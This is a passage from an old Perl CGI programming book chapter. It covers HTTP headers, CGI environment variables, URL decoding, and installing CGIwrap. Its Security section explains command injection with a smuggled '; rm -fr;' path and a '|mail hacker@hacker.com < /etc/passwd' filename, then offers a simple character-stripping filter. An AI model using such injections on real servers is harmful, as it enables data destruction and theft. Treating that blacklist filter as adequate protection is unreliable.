📄 ch19.htm
字号:
</PRE></BLOCKQUOTE><P>ONCe the <TT>Location</TT> headerhas been printed, nothing else should be printed. That is allthe information that the client Web browser needs.<P>Cookies and the <TT>Set-cookie:</TT>header are discussed in the "Cookies" section laterin this chapter.<P>The last type of HTTP header is the <TT>Status</TT>header. This header should be sent when an error arises in yourscript that your program is not equipped to handle. I feel thatthis HTTP header should not be used unless you are under severetime pressure to complete a project. You should try to createyour own error handling routines that display a full Web pagethat explains the error that happened and what the user can doto fix or circumvent it. You might iNClude the time, date, typeof error, contact names and phone numbers, and any other informationthat might be useful to the user. Relying on the standard errormessages of the Web server and browser will make your Web siteless user friendly.<H2><A NAME="CGIandEnvironmentVariables"><FONT SIZE=5 COLOR=#FF0000>CGI and Environment Variables</FONT></A></H2><P>You are already familiar with environment variables if you read<A HREF="ch12.htm" >Chapter 12</A>, "Using Special Variables." When your CGIprogram is started, the Web server creates and initializes a numberof environment variables that your program can access using the<TT>%ENV</TT> hash.<P>Table 19.2 contains a short description of each environment variable.A complete description of the environmental variables used inCGI programs can be found at<BLOCKQUOTE><PRE>http://www.ast.cam.ac.uk/~drtr/cgi-spec.html<BR></PRE></BLOCKQUOTE><P><CENTER><B>Table 19.2 CGI Environment Variables</B></CENTER><p><CENTER><TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%><TR><TD WIDTH=199><I>Variable Name</I></TD><TD WIDTH=391><I>Description</I></TD></TR><TR><TD WIDTH=199>AUTH_TYPE</TD><TD WIDTH=391>Optionally provides the authentication protocol used to access your script if the local Web server supports authentication and if authentication was used to access your script.</TD></TR><TR><TD WIDTH=199>CONTENT_LENGTH</TD><TD WIDTH=391>Optionally provides the length, in bytes, of the content provided to the script through the <TT>STDIN </TT>file handle. Used particularly in the <TT>POST</TT> method of form processing. See <A HREF="ch20.htm" >Chapter 20</A>, "Form Processing," for more information.</TD></TR><TR><TD WIDTH=199>CONTENT_TYPE</TD><TD WIDTH=391>Optionally provides the type of content available from the <TT>STDIN</TT> file handle. This is used for the <TT>POST</TT> method of form processing. Most of the time, this variable will be blank and you can assume a value of <TT>application/octet-stream</TT>. </TD></TR><TR><TD WIDTH=199>GATEWAY_INTERFACE</TD><TD WIDTH=391>Provides the version of CGI supported by the local Web server. Most of the time, this will be equal to <TT>CGI/1.1</TT>.</TD></TR><TR><TD WIDTH=199>HTTP_AccEPT</TD><TD WIDTH=391>Provides a comma-separated list of MIME types the browser software will accept. You might check this environmental variable to see if the client will accept a certain kind of graphic file.</TD></TR><TR><TD WIDTH=199>HTTP_FORM</TD><TD WIDTH=391>Provides the user's e-mail address. Not all Web browsers will supply this information to your server. Therefore, use this field only to provide a default value for an HTML form.</TD></TR><TR><TD WIDTH=199>HTTP_USER_AGENT</TD><TD WIDTH=391>Provides the type and version of the user's Web browser. For example, the Netscape Web browser is called Mozilla.</TD></TR><TR><TD WIDTH=199>PATH_INFO</TD><TD WIDTH=391>Optionally contains any extra path information from the HTTP request that invoked the script.</TD></TR><TR><TD WIDTH=199>PATH_TRANSLATED</TD><TD WIDTH=391>Maps the script's virtual path (i.e., from the root of the server directory) to the physical path used to call the script.</TD></TR><TR><TD WIDTH=199>QUERY_STRING</TD><TD WIDTH=391>Optionally contains form information when the GET method of form processing is used. QUERY_STRING is also used for passing information such as search keywords to CGI scripts.</TD></TR><TR><TD WIDTH=199>REMOTE_ADDR</TD><TD WIDTH=391>Contains the dotted decimal address of the user.</TD></TR><TR><TD WIDTH=199>REMOTE_HOST</TD><TD WIDTH=391>Optionally provides the domain name for the site that the user has connected from.</TD></TR><TR><TD WIDTH=199>REMOTE_IDENT</TD><TD WIDTH=391>Optionally provides client identification when your local server has contacted an IDENTD server on a client machine. You will very rarely see this because the IDENTD query is slow.</TD></TR><TR><TD WIDTH=199>REMOTE_USER</TD><TD WIDTH=391>Optionally provides the name used by the user to access your secured script. </TD></TR><TR><TD WIDTH=199>REQUEST_METHOD</TD><TD WIDTH=391>Usually contains either "GET" or "POST"-the method by which form information will be made available to your script. See <A HREF="ch20.htm" >Chapter 20</A>, "Form Processing," for more information.</TD></TR><TR><TD WIDTH=199>SCRIPT_NAME</TD><TD WIDTH=391>Contains the virtual path to the script.</TD></TR><TR><TD WIDTH=199>SERVER_NAME</TD><TD WIDTH=391>Contains the configured hostname for the server.</TD></TR><TR><TD WIDTH=199>SERVER_PORT</TD><TD WIDTH=391>Contains the port number that the local Web server software is listening on. The standard port number is 80.</TD></TR><TR><TD WIDTH=199>SERVER_PROTOCOL</TD><TD WIDTH=391>Contains the version of the Web protocol this server uses. For example, <TT>HTTP/1.0</TT>.</TD></TR><TR><TD WIDTH=199>SERVER_SOFTWARE</TD><TD WIDTH=391>Contains the name and version of the Web server software. For example, <TT>WebSite/1.1e</TT>.</TD></TR></TABLE></CENTER><P><H2><A NAME="URLENCoding"><FONT SIZE=5 COLOR=#FF0000>URL ENCoding</FONT></A></H2><P>One of the limitations that the WWW organizations have placedon the HTTP protocol is that the content of the commands, responses,and data that are passed between client and server should be clearlydefined. It is sometimes difficult to tell simply from the contextwhether a space character is a field delimiter or an actual spacecharacter to add whitespace between two words.<P>To clear up the ambiguity, the URL eNCoding scheme was created.Any spaces are converted into plus (<TT>+</TT>)signs to avoid semantic ambiguities. In addition, special charactersor 8-bit values are converted into their hexadecimal equivalentsand prefaced with a percent sign (<TT>%</TT>).For example, the string <TT>Davy Jones <dj@planet.net></TT>is eNCoded as <TT>Davy+Jones+%3Cdj@planet.net%3E</TT>.If you look closely, you see that the <TT><</TT>character has been converted to <TT>%3C</TT>and the <TT>></TT> character hasbeen coverted to <TT>%3E</TT>.<P>Your CGI script will need to be able to convert URL eNCoded informationback into its normal form. Fortunately, Listing 19.2 containsa fuNCtion that will convert URL eNCoded.<P><IMG SRC="pseudo.gif" BORDER=1 ALIGN=RIGHT><p><BLOCKQUOTE><I>Define the </I><TT><I>decodeURL()</I></TT><I>fuNCtion.<BR>Get the eNCoded string from the parameter array.<BR>Translate all plus signs into spaces.<BR>Convert character coded as hexadecimal digits into regular characters.<BR>Return the decoded string.</I></BLOCKQUOTE><HR><BLOCKQUOTE><B>Listing 19.2 19LST02.PL-How to Decode the URL ENCoding<BR></B></BLOCKQUOTE><BLOCKQUOTE><PRE>sub decodeURL { $_ = shift; tr/+/ /; s/%(..)/pack('c', hex($1))/eg; return($_);}</PRE></BLOCKQUOTE><HR><P>This fuNCtion will be used in <A HREF="ch20.htm" >Chapter 20</A>, "Form Processing,"to decode form information. It is presented here because cannedqueries also use URL eNCoding.<H2><A NAME="Security"><FONT SIZE=5 COLOR=#FF0000>Security</FONT></A></H2><P>CGI really has only one large security hole that I can see. Ifyou pass information that came from a remote site to an operatingsystem command, you are asking for trouble. I think an exampleis needed to understand the problem because it is not obvious.<P>Suppose that you had a CGI script that formatted a directory listingand generated a Web page that let visitors view the listing. Inaddition, let's say that the name of the directory to displaywas passed to your program using the <TT>PATH_INFO</TT>environment variable. The following URL could be used to callyour program:<BLOCKQUOTE><PRE>http://www.foo.com/cgi-bin/dirlist.pl/docs</PRE></BLOCKQUOTE><P>Inside your program, the <TT>PATH_INFO</TT>environment variable is set to <TT>docs</TT>.In order to get the directory listing, all that is needed is acall to the <TT>ls</TT> command inUNIX or the <TT>dir</TT> command inDOS. Everything looks good, right?<P>But what if the program was invoked with this command line?<BLOCKQUOTE><PRE>http://www.foo.com/cgi-bin/dirlist.pl/; rm -fr;</PRE></BLOCKQUOTE><P>Now, all of a sudden, you are faced with the possibility of filesbeing deleted because the semi-colon (;) lets multiple commandsbe executed on one command line.<P>This same type of security hole is possible any time you try torun an external command. You might be tempted to use the <TT>mail</TT>,<TT>sendmail</TT>, or <TT>grep</TT>commands to save time while writing your CGI program, but becauseall of these programs are easily duplicated using Perl, try toresist the temptation.<P>Another security hole is related to using external data to openor create files. Some enterprising hacker could use <TT>"|mail hacker@hacker.com < /etc/passwd"</TT> as thefilename to mail your password file or any other file to himself.<P>All of these security holes can be avoided by removing the dangerouscharacters (like the | or pipe character).<P><IMG SRC="pseudo.gif" BORDER=1 ALIGN=RIGHT><p><BLOCKQUOTE><I>Define the </I><TT><I>improveSecurity()</I></TT><I>fuNCtion.<BR>Copy the passed string into </I><TT><I>$_</I></TT><I>,the default search space.<BR>Protect against command-line options by removing </I><TT><I>-</I></TT><I>and </I><TT><I>+</I></TT><I> characters.<BR>Additional protection against command-line options.<BR>Convert all dangerous characters into harmless underscores.<BR>Return the </I><TT><I>$_</I></TT><I>variable.</I></BLOCKQUOTE><P>Listing 19.3 shows how to remove dangerous characters.<HR><BLOCKQUOTE><B>Listing 19.3 19LST03.PL-How to Remove DangerousCharacters<BR></B></BLOCKQUOTE><BLOCKQUOTE><PRE>sub improveSecurity { $_ = shift; s/\-+(.*)/\1/g; s/(.*)[ \t]+\-(.*)/\1\2/g; tr/\$\'\`\"\<\>\/\;\!\|/_/; return($_);}</PRE></BLOCKQUOTE><HR><H2><A NAME="CGIwrapandSecurity"><FONT SIZE=5 COLOR=#FF0000>CGIwrap and Security</FONT></A></H2><P>CGIwrap (<B>http://wwwcgi.umr.edu/~cgiwrap/</B>) is a UNIX-basedutility written by Nathan Neulinger that lets general users runCGI scripts without needing access to the server's <TT>cgi-bin</TT>directory. Normally, all scripts must be located in the server'smain <TT>cgi-bin</TT> directory andall run with the same UID (user ID) as the Web server. CGIwrapperforms various security checks on the scripts before changingID to match the owner of the script. All scripts are executedwith same the user ID as the user who owns them. CGIwrap workswith NCSA, Apache, CERN, Netsite, and probably any other UNIXWeb server.<P>Any files created by a CGI program are normally owned by the Webserver. This can cause a problem if you need to edit or removefiles created by CGI programs. You might have to ask the systemadministrator for help because you lack the proper auhorization.All CGI programs have the same system permissions as the Web server.If you run your Web server under the root user ID-being eithervery brave or very foolish-a CGI program could be tricked intoerasing the entire hard drive. CGIwrap provides a way around theseproblems.<P>With CGIwrap, scripts are located in users' <TT>public_html/cgi-bin</TT>directory and run under their user ID. This means that any filesthe CGI program creates are owned by the same user. Damage causedby any security bugs you may have introduced-via the CGI program-willbe limited to your own set of directories.<P>In addition to this security advantage, CGIwrap is also an excellentdebugging tool. When CGIwrap is installed, it is copied to <TT>cgiwrapd</TT>,which can be used to view output of failing CGIs.<P>You can install CGIwrap by following these steps:<OL><LI>Obtain the source from the <B>http://www.umr.edu/~cgiwrap/download.html</B>Web page.<LI>Ensure that you have root access.<LI>Unpack and run the Configure script.<LI>Type <B>make</B>.<LI>With a user ID of root, copy the <TT>cgiwrap</TT>executable to your server's <TT>cgi-bin</TT>directory.<LI>Make sure that <TT>cgiwrap</TT>is owned by root and executable by all users by typing <B>chownroot cgiwrap; chmod 4755 cgiwrap</B>. The <TT>cgiwrap</TT>executabe must also be set UID.<LI>In order to gain the debugging advantages of CGIwrap, createsymbolic links to <TT>cgiwrap</TT>called <TT>cgiwrapd</TT>, <TT>nph-cgiwrap</TT>,and <TT>nph-cgiwrapd</TT>. The firstsymbolic link can be created by typing <B>ln -s cgiwrap cgiwrapd</B>.The others are created using similar commands.</OL><P><p><CENTER><TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%><TR><TD><B>Tip</B></TD></TR><TR><TD><BLOCKQUOTE>You can find additional information at the <TT><B><FONT FACE="Courier">http://www.umr.edu/<B>~cgiwrap/install.html</B></FONT></B></TT> web site.</BLOCKQUOTE></TD></TR></TABLE></CENTER><P><P>CGIs that run using CGIwrap are stored in a <TT>cgi-bin</TT>directory under an individual user's public Web directory andcalled like this:<BLOCKQUOTE><PRE>http://servername/cgi-bin/cgiwrap/~userid/scriptname</PRE></BLOCKQUOTE><P>To debug a script run via cgiwrap, add the letter "d"to <TT>cgiwrap</TT>:<BLOCKQUOTE><PRE>http://servername/cgi-bin/cgiwrapd/~userid/scriptname</PRE></BLOCKQUOTE><P>When you use CGIwrap to debug your CGI programs, quite a lot ofinformation will be displayed in the Web browser's window. Forexample, if you called a CGI program with the following URL:<BLOCKQUOTE><PRE>http://www.engr.iupui.edu/cgi-bin/cgiwrapd/~dbewley/cookie-test.pl
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -